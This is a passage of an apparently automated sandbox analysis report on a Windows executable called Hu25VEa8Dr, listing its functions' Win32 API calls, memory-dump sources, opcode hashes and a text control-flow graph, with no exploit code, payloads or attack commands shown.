            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
            • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
            • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
            • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 473 401b06-401b11 474 401b13-401b16 473->474 475 401b57-401b59 473->475 478 4021fb-402213 call 405a2e call 4052cd 474->478 479 401b1c-401b20 474->479 476 401b80-401b96 GlobalAlloc call 405a2e 475->476 477 401b5b-401b5d 475->477 488 401b9b-401ba8 476->488 480 401b63-401b7b call 405a0c GlobalFree 477->480 481 40265c-402663 477->481 478->481 496 402896-40289a 478->496 479->474 484 401b22-401b24 479->484 486 40288b-402894 480->486 481->486 484->478 485 401b2a-4027b6 call 405a0c * 3 484->485 485->486 486->496 488->486
            APIs
            • GlobalFree.KERNEL32(00000000), ref: 00401B75
            • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Global$AllocFree
            • String ID:
            • API String ID: 3394109436-0
            • Opcode ID: 7844cdec247ac3d2d35134a6f1d3b53f218c9fb6cb13e3d504aae78faa3084e8
            • Instruction ID: 02e27a443d0c975bd2d35078e55c9ecbb47b75263e9a7029776e4410220f8425
            • Opcode Fuzzy Hash: 7844cdec247ac3d2d35134a6f1d3b53f218c9fb6cb13e3d504aae78faa3084e8
            • Instruction Fuzzy Hash: C821C3B67002029BC710EB94DEC595F73A8EB84368724463BF502F32D0DB78AC019B5E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403094
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
            • Instruction ID: 43e3c0ed55451ca58d66c179b0d5cd373ba627774d09ad719adf1b780fd88a5d
            • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
            • Instruction Fuzzy Hash: F0E08631101119BBCF105E61AC00A9B3F9CEB05362F00C032FA04E5190D538DA14DBA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B28
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Open
            • String ID:
            • API String ID: 71445658-0
            • Opcode ID: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
            • Instruction ID: 26822e9457f7499eaf47d686268157363fcd7c772d88ad4a089d565b944a1739
            • Opcode Fuzzy Hash: 332b4b28ccf70e09bb7c329d8b92fdd51d6a369451d7e4fe1d23c46d78dfb372
            • Instruction Fuzzy Hash: 4DE08CB6240108BFDB50EFA5ED4BFD677ECBB04340F008921B618EB091CA75E5809B68
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: 25ac80cc8f42eb6b6973bcf28b0dcf98930a4937f6a650695082248e1846420d
            • Instruction ID: fb11a27b057d952daa1a0232a569a569c421c01e2099f6af0567112f3631a007
            • Opcode Fuzzy Hash: 25ac80cc8f42eb6b6973bcf28b0dcf98930a4937f6a650695082248e1846420d
            • Instruction Fuzzy Hash: 60D01273B08211D7DB50EFA59E4859D7664AB503A8B204637E512F11D0D2B98541A619
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,?), ref: 004030BD
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
            • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
            • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
            • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CloseHandle.KERNEL32(FFFFFFFF), ref: 00403486
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CloseHandle
            • String ID:
            • API String ID: 2962429428-0
            • Opcode ID: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
            • Instruction ID: dd629d7ffa80b2531d7668e5a1a305395e4adc4893f6b58610a8e469f8d50dee
            • Opcode Fuzzy Hash: 5a6660c02ad1c86e623dcf8c9c59cdfb5971a71a93a5c6486248268c0836a900
            • Instruction Fuzzy Hash: F8C01230504600E6D2246F759E0A6093A18574173AB904336B179B50F1C77C5901453E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetDlgItem.USER32(?,00000403), ref: 00404F47
            • GetDlgItem.USER32(?,000003EE), ref: 00404F56
            • GetClientRect.USER32 ref: 00404F93
            • GetSystemMetrics.USER32 ref: 00404F9B
            • SendMessageA.USER32 ref: 00404FBC
            • SendMessageA.USER32 ref: 00404FCD
            • SendMessageA.USER32 ref: 00404FE0
            • SendMessageA.USER32 ref: 00404FEE
            • SendMessageA.USER32 ref: 00405001
            • ShowWindow.USER32(00000000,?), ref: 00405023
            • ShowWindow.USER32(?,00000008), ref: 00405037
            • GetDlgItem.USER32(?,000003EC), ref: 00405058
            • SendMessageA.USER32 ref: 00405068
            • SendMessageA.USER32 ref: 00405081
            • SendMessageA.USER32 ref: 0040508D
            • GetDlgItem.USER32(?,000003F8), ref: 00404F65
              • Part of subcall function 00403DF3: SendMessageA.USER32 ref: 00403E01
            • GetDlgItem.USER32(?,000003EC), ref: 004050AA
            • CreateThread.KERNEL32(00000000,00000000,Function_00004E7C,00000000), ref: 004050B8
            • CloseHandle.KERNEL32(00000000), ref: 004050BF
            • ShowWindow.USER32(00000000), ref: 004050E3
            • ShowWindow.USER32(?,00000008), ref: 004050E8
            • ShowWindow.USER32(00000008), ref: 0040512F
            • SendMessageA.USER32 ref: 00405161
            • CreatePopupMenu.USER32 ref: 00405172
            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405187
            • GetWindowRect.USER32(?,?), ref: 0040519A
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004051BE
            • SendMessageA.USER32 ref: 004051F9
            • OpenClipboard.USER32(00000000), ref: 00405209
            • EmptyClipboard.USER32 ref: 0040520F
            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405218
            • GlobalLock.KERNEL32 ref: 00405222
            • SendMessageA.USER32 ref: 00405236
            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040524E
            • SetClipboardData.USER32 ref: 00405259
            • CloseClipboard.USER32 ref: 0040525F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
            • String ID: {
            • API String ID: 590372296-366298937
            • Opcode ID: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
            • Instruction ID: ecf959edf644124ae9a18d4fa2a520563b4821934e06b5e1f2851b0e4fc8d151
            • Opcode Fuzzy Hash: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
            • Instruction Fuzzy Hash: FBA14870900208BFEB219FA1DD89AAE7F79FB08355F40407AFA05AA2A0C7755E41DF59
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetDlgItem.USER32(?,000003F9), ref: 00404710
            • GetDlgItem.USER32(?,00000408), ref: 0040471D
            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404769
            • LoadBitmapA.USER32 ref: 0040477C
            • SetWindowLongA.USER32(?,000000FC,00404CFA), ref: 00404796
            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004047AA
            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004047BE
            • SendMessageA.USER32 ref: 004047D3
            • SendMessageA.USER32 ref: 004047DF
            • SendMessageA.USER32 ref: 004047F1
            • DeleteObject.GDI32(?), ref: 004047F6
            • SendMessageA.USER32 ref: 00404821
            • SendMessageA.USER32 ref: 0040482D
            • SendMessageA.USER32 ref: 004048C2
            • SendMessageA.USER32 ref: 004048ED
            • SendMessageA.USER32 ref: 00404901
            • GetWindowLongA.USER32(?,000000F0), ref: 00404930
            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040493E
            • ShowWindow.USER32(?,00000005), ref: 0040494F
            • SendMessageA.USER32 ref: 00404A52
            • SendMessageA.USER32 ref: 00404AB7
            • SendMessageA.USER32 ref: 00404ACC
            • SendMessageA.USER32 ref: 00404AF0
            • SendMessageA.USER32 ref: 00404B16
            • ImageList_Destroy.COMCTL32(?), ref: 00404B2B
            • GlobalFree.KERNEL32(?), ref: 00404B3B
            • SendMessageA.USER32 ref: 00404BAB
            • SendMessageA.USER32 ref: 00404C54
            • SendMessageA.USER32 ref: 00404C63
            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C83
            • ShowWindow.USER32(?,00000000), ref: 00404CD1
            • GetDlgItem.USER32(?,000003FE), ref: 00404CDC
            • ShowWindow.USER32(00000000), ref: 00404CE3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 1638840714-813528018
            • Opcode ID: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
            • Instruction ID: 30a51c26aaa2b30bd696497e7e47c5adc9155ce2862f65cc436e234c57937e2f
            • Opcode Fuzzy Hash: 9006264d80cea567de8ea85ae76f5f4e6db86d56f38ece968a838e3dcd762fad
            • Instruction Fuzzy Hash: D402AFB0A00208AFDB20DF55DD45AAE7BB5FB84314F10817AF611BA2E1D7799E42CF58
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetDlgItem.USER32(?,000003FB), ref: 00404248
            • SetWindowTextA.USER32(?,?), ref: 00404275
            • SHBrowseForFolderA.SHELL32(?,004293B0,?), ref: 0040432A
            • CoTaskMemFree.OLE32(00000000), ref: 00404335
            • lstrcmpiA.KERNEL32(hjgjhad,00429FE0,00000000,?,?), ref: 00404367
            • lstrcatA.KERNEL32(?,hjgjhad), ref: 00404373
            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404383
              • Part of subcall function 004052B1: GetDlgItemTextA.USER32 ref: 004052C4
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
              • Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
              • Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8
            • GetDiskFreeSpaceA.KERNEL32(00428FA8,?,?,0000040F,?,00428FA8,00428FA8,?,00000000,00428FA8,?,?,000003FB,?), ref: 0040443C
            • MulDiv.KERNEL32 ref: 00404457
            • SetDlgItemTextA.USER32(00000000,00000400,00428F98), ref: 004044D0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
            • String ID: A$hjgjhad
            • API String ID: 2246997448-1285462269
            • Opcode ID: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
            • Instruction ID: 52dfe11e264a0fce323933678d720eed1997f61c196974170264a293bd140da1
            • Opcode Fuzzy Hash: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
            • Instruction Fuzzy Hash: 19915FB1A00219ABDF11AFA1CC85AAF7BB8EF84315F10407BFA00B6291D77C99418F59
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetVersion.KERNEL32(?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405AD6
            • GetSystemDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B51
            • GetWindowsDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B64
            • SHGetSpecialFolderLocation.SHELL32(?,0041DB88), ref: 00405BA0
            • SHGetPathFromIDListA.SHELL32(0041DB88,hjgjhad), ref: 00405BAE
            • CoTaskMemFree.OLE32(0041DB88), ref: 00405BB9
            • lstrcatA.KERNEL32(hjgjhad,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BDB
            • lstrlenA.KERNEL32(hjgjhad,?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405C2D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hjgjhad
            • API String ID: 900638850-281039111
            • Opcode ID: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
            • Instruction ID: e3937826694aa96a66c9679703be47664347117baa65301e61951ea2719d1281
            • Opcode Fuzzy Hash: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
            • Instruction Fuzzy Hash: DB51F331A04B05AAEF219B689C84BBF3BB4DB15314F54423BE912B62D0D27C6D42DF4E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?), ref: 00402073
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409378,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ByteCharCreateInstanceMultiWide
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 123533781-2935972921
            • Opcode ID: e2440bd97a0de28c640c01a9d5d42cc8b810f7137a49c2ac781f9d5420d32ae4
            • Instruction ID: ee874f8c2dec57c4877f78095a0f9dac743c80c93ea62094aeb2a8065092a27c
            • Opcode Fuzzy Hash: e2440bd97a0de28c640c01a9d5d42cc8b810f7137a49c2ac781f9d5420d32ae4
            • Instruction Fuzzy Hash: 07417D75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: FileFindFirst
            • String ID:
            • API String ID: 1974802433-0
            • Opcode ID: 91dde0ba118db7d7ebc8a8be9eaa396cb067559f4d74f26d235d81ef142ed7f1
            • Instruction ID: c4edc1118dc91e0c9440d01bfde8b8f2caf312925950fbc99ec99334c7621aa2
            • Opcode Fuzzy Hash: 91dde0ba118db7d7ebc8a8be9eaa396cb067559f4d74f26d235d81ef142ed7f1
            • Instruction Fuzzy Hash: E3F0E572648101DFD700EBB49D49AEEB768DF51328FA007BBF502F20C1C2B84945DB2A
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
